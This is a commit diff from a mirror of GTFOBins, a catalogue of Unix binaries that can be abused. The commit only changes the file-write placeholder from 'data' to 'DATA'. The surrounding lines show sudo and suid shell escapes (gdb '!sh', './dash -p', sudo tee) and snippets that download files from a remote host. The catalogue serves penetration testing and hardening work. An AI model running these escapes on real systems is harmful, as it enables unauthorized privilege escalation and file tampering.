mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Use DATA as a placeholder for file-write operations
This commit is contained in:
parent
866ca2e404
commit
d4b50275bb
@ -75,11 +75,11 @@ load-library:
|
||||
file-read:
|
||||
label: File read
|
||||
description: |
|
||||
It reads files and may be used to do privileged reads or disclose files
|
||||
outside a restricted file system.
|
||||
It reads data from files, it may be used to do privileged reads or disclose
|
||||
files outside a restricted file system.
|
||||
|
||||
file-write:
|
||||
label: File write
|
||||
description: |
|
||||
It writes files and may be used to do privileged writes or write files
|
||||
outside a restricted file system.
|
||||
It writes data to files, it may be used to do privileged writes or write
|
||||
files outside a restricted file system.
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
|
@ -22,7 +22,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -39,7 +39,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
bash -c 'echo DATA > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
busybox sh -c 'echo "DATA" > $LFILE'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
echo "DATA" | dd of=$LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -8,7 +8,7 @@ functions:
|
||||
- code: |
|
||||
ed file_to_write
|
||||
a
|
||||
data
|
||||
DATA
|
||||
.
|
||||
w
|
||||
q
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
data
|
||||
DATA
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: emacs file_to_read
|
||||
|
@ -11,7 +11,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -39,7 +39,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
ksh -c 'echo DATA > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
|
@ -56,7 +56,7 @@ functions:
|
||||
f:write(d);
|
||||
io.close(f);'
|
||||
file-write:
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);'
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||
file-read:
|
||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||
sudo-enabled:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
nano file_to_write
|
||||
data
|
||||
DATA
|
||||
^O
|
||||
file-read:
|
||||
- code: nano file_to_read
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
pico file_to_write
|
||||
data
|
||||
DATA
|
||||
^O
|
||||
file-read:
|
||||
- code: pico file_to_read
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
export LFILE="/tmp/file_to_write"
|
||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||
puppet apply -e "file { '$LFILE': content => 'DATA' }"
|
||||
file-read:
|
||||
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
||||
code: |
|
||||
|
@ -25,7 +25,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python2 -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python2 -c 'open("file_to_read").read()'
|
||||
load-library:
|
||||
|
@ -25,7 +25,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python3 -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python3 -c 'open("file_to_read").read()'
|
||||
load-library:
|
||||
|
@ -6,7 +6,7 @@ functions:
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo data
|
||||
rlwrap -l "$LFILE" echo DATA
|
||||
suid-enabled:
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
|
@ -22,7 +22,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
||||
file-write:
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
load-library:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
||||
sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -4,14 +4,14 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e data -o "$LFILE"
|
||||
shuf -e DATA -o "$LFILE"
|
||||
suid-enabled:
|
||||
- description:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e data -o "$LFILE"
|
||||
./shuf -e DATA -o "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e data -o "$LFILE"
|
||||
sudo shuf -e DATA -o "$LFILE"
|
||||
---
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -10,7 +10,7 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo data > "$TF"
|
||||
echo DATA > "$TF"
|
||||
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
||||
file-read:
|
||||
- description: This only works for GNU tar.
|
||||
|
@ -4,13 +4,13 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | sudo tee -a "$LFILE"
|
||||
echo DATA | sudo tee -a "$LFILE"
|
||||
---
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
vi file_to_write
|
||||
idata
|
||||
iDATA
|
||||
^[
|
||||
w
|
||||
file-read:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
vim file_to_write
|
||||
idata
|
||||
iDATA
|
||||
^[
|
||||
w
|
||||
file-read:
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | xxd | xxd -r - "$LFILE"
|
||||
echo DATA | xxd | xxd -r - "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
Loading…
Reference in New Issue
Block a user